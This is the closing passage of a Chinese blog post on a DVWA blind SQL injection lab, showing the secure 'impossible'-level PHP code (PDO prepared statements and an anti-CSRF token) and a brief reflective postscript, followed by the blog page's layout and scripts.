    $data-&gt;bindParam( &#39;:id&#39;, $id, PDO::PARAM_INT );
    $data-&gt;execute();

    // Get results
    if( $data-&gt;rowCount() == 1 ) &#123;
        // Feedback for end user
        $html .= &#39;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&#39;;
    &#125;
    else &#123;
        // User wasn&#39;t found, so the page wasn&#39;t!
        header( $_SERVER[ &#39;SERVER_PROTOCOL&#39; ] . &#39; 404 Not Found&#39; );

        // Feedback for end user
        $html .= &#39;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&#39;;
    &#125;
&#125;
&#125;

// Generate Anti-CSRF token
generateSessionToken();

?&gt;
</code></pre>
<p>这里是数字型，然后还是老套路，pdo技术去预编译，然后检验token防CSRF，可以很好地预防sql注入。</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>做完dvwa靶场后，感觉还是要多练练题，不然知识不能很好地运用，也容易忘，同时知道理论没办法亲手自己用黑盒测试等实践出来也没用。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        Author:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">hzk</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        Link:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2022/01/26/DVWA-SQL-Blind/">http://example.com/2022/01/26/DVWA-SQL-Blind/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        Reprint policy:
                    </i>
                </span>
                <span class="reprint-info">
                    All articles in this blog are used except for special statements
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    reprint policy. If reproduced, please indicate source
                    <a href="/about" target="_blank">hzk</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>Copied successfully, please follow the reprint policy of this article</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">more</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/sqli/">
                                    <span class="chip bg-color">sqli</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2022/01/26/DVWA-CSRF/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/16.jpg" class="responsive-img" alt="DVWA--CSRF">
                        
                        <span class="card-title">DVWA--CSRF</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2022-01-26
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hzk
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/CSRF/">
                        <span class="chip bg-color">CSRF</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/01/25/DVWA-Java-Script/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/19.jpg" class="responsive-img" alt="DVWA--Java Script">
                        
                        <span class="card-title">DVWA--Java Script</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-01-25
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            hzk
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/js/">
                        <span class="chip bg-color">js</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">hzk</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;Total visits:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;Total visitors:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/shianer" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:292595085@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=292595085" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 292595085" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
